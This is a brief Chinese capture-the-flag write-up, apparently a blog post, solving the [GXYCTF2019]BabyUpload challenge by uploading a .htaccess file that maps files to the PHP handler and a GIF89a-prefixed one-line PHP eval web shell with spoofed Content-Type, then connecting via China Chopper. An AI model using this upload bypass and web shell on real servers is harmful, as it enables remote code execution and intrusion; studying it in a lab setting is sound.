[GXYCTF2019]BabyUpload

这题我先上传了一个正常的图片,一直传不上。奇了怪了,原来是对图片大小还有限制。

传个空的jpg文件上传成功。

上传php2, php3, php4, php5, phps, pht, phtm, phtml后缀也都爆出ph的检查。

上传.htaccess文件修改content-type为image/jpeg可绕过检查。

内容为

SetHandler application/x-httpd-php

[GXYCTF2019]BabyUpload

 传个webshell继续修改content-type,菜刀连接。

GIF89a?
<script language="php">eval($_POST['a']);</script>

根目录找到flag

上一篇:记一次使用Chrome修改user-agent


下一篇:buuctf-misc-[GXYCTF2019]gakki